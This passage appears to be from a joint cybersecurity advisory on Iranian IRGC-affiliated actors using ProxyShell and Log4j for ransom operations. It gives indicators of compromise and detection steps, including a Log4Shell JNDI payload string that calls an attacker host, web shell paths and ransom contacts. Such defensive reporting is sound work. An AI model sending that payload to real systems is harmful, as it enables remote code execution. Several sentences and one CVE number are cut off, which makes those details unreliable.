Threat Actor Activity
As reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the authoring agencies have observed Iranian government-sponsored
Since the activity was reported in 2021, these IRGC-affiliated actors have continued to exploit known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities CVE-2021-44228 (“Log4Shell”), CVE-2021-45046, and CVE-2021-45105 for initial access.
The IRGC-affiliated actors have used their access for ransom operations, including disk encryption and extortion efforts. After gaining access to a network, the IRGC-affiliated actors likely determine a course of action based on their perceived value of the data. Depending on the perceived value, the actors may encrypt data for ransom and/or exfiltrate data. The actors may sell the data or use the exfiltrated data in extortion operations or “double extortion” ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.
IRGC-affiliated actor activity observed by the authoring agencies includes:
- In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) on a Microsoft Exchange server to gain access to the network of a U.S. police department. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom.
- In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), on a Microsoft Exchange server to gain access to the network of a U.S. regional transportation company. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom. This activity disrupted the transportation company’s operations for an extended period.
- In February 2022, the actors exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105) in a VMware Horizon application to gain access to the network of a U.S. municipal government, move laterally within the network, establish persistent access, initiate crypto-mining operations, and conduct additional malicious activity.
- In February 2022, the actors may have exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021) to gain access to the network of a U.S. aerospace company. The actors leveraged a server that the authoring agencies assess is associated with the IRGC-affiliated actors to exfiltrate data from the company's network.
MITRE ATT&CK® Tactics and Techniques
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 11. See Appendix B for a table of the MITRE ATT&CK tactics and techniques observed.
The authoring agencies assess the following tactics and techniques are associated with this activity.
Resource Development [TA0042]
The IRGC-affiliated actors have used the following malicious and legitimate tools [T1588.001, T1588.002] for a variety of tactics across the enterprise spectrum:
- Fast Reverse Proxy (FRP) for command and control (C2)
- Plink for C2
- Remote Desktop Protocol (RDP) for lateral movement
- BitLocker for data encryption
- SoftPerfect Network Scanner for system network configuration discovery
Note: For additional tools used by these IRGC-affiliated cyber actors, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.
Initial Access [TA0001]
As stated in the Technical Details section previously reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the IRGC-affiliated actors gained initial access by exploiting known vulnerabilities [T1190].
The following IOCs, observed as of March 2022, are indicative of ProxyShell vulnerability exploitation on targeted entity networks:
- Web shells with naming conventions
aspx_[11 randomly generated alphabetic characters].aspx ,login.aspx , ordefault.aspx in any of the following directories:C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\ C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\ C:\inetpub\wwwroot\aspnet_client\
The following IOCs, observed as of December 2021, are indicative of Log4j vulnerability exploitation on targeted entity networks:
${jndi:ldap//148.251.71.182:1389/RCE} (user agent string) RCE.class
Execution [TA0002]
The IRGC-affiliated actors may have made modifications to the Task Scheduler [T1053.005]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:
Wininet Wininet’ WinLogon CacheTask
Note: The potential exists that tasks associated with CacheTask or Wininet may be legitimate. For additional tasks used by these IRGC-affiliated cyber actors, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.
Persistence [TA0003]
The IRGC-affiliated actors established new user accounts on domain controllers, servers, workstations, and active directories [T1136.001, T1136.002]. The actors enabled a built-in Windows account (DefaultAccount) and escalated privileges to gain administrator-level access to a network. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:
Domain Admin it_admin DefaultAccount Default01
Note: For additional account usernames associated with this activity, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.
Exfiltration [TA0010]
The authoring agencies have observed the IRGC-affiliated actors dumping and subsequently exfiltrating the Local Security Authority Subsystem Service (LSASS) process memory on targeted entity networks in furtherance of credential harvesting. The following IOCs are associated with data exfiltration from targeted entity networks:
C:\Windows\Temp\sassl[.]pmd C:\Windows\Temp\ssasl[.]zip C:\Users\DefaultAccount\AppData\Local\Temp\lsass[.]dmp C:\Users\DefaultAccount\AppData\Local\Temp\lsass[.]zip
Impact [TA0040]
The IRGC-affiliated actors forced BitLocker activation on host networks to encrypt data [T1486] and held the decryption keys for ransom. The corresponding ransom notes were sent to the targeted entity, left on the targeted entity network as a
@BuySafety (Telegram) @WeRBits (Telegram) +93794415076 (WhatsApp) werbits@onionmail[.]org buysafety@onionmail[.]org yacashcash@rambler[.]ru
Note: For additional contact information included in ransom notes, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.
DETECTION
The authoring agencies recommend that organizations using Microsoft Exchange servers, Fortinet devices, and/or VMware Horizon applications investigate potential suspicious activity in their networks.
- Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts.
- Note: Refer to Appendix A for IOCs.
- Review Log4j vulnerabilities, including CVE-2021-44228, CVE-2021-45046, and CVE-2021- 45105.
- Review Microsoft Exchange ProxyShell vulnerabilities, including CVE-2021-34473, CVE-2021- 34523, and CVE-2021-31207.
- As a precaution, review additional Microsoft Exchange vulnerabilities, including CVE-2021- 31196, CVE-2021-31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470 because the authoring agencies have seen the actors broadly target Microsoft Exchange servers.
- Investigate exposed Microsoft Exchange servers, both patched and unpatched, for compromise.
- Review Fortinet FortiOS vulnerabilities, including CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
- Review VMware vulnerabilities, including any relevant vulnerabilities listed on the VMware security advisory page.
- Investigate changes to RDP, firewall, and Windows Remote Management (WinRM) configurations that may allow malicious cyber actors to maintain persistent access.
- Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
- Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system and scheduled tasks—including each step these tasks perform—for unrecognized “actions.”
- Review antivirus logs for indications they were unexpectedly turned off.
- Look for WinRAR and FileZilla in unexpected locations.
- Review servers and workstations for malicious executable files masquerading as legitimate Windows processes. Malicious files may not be found in the expected directory and may have cmd.exe or powershell.exe as their parent process.
Note: For additional approaches on uncovering malicious cyber activity, see joint advisory Technical Approaches to Uncovering and Remediating Malicious Activity, authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.
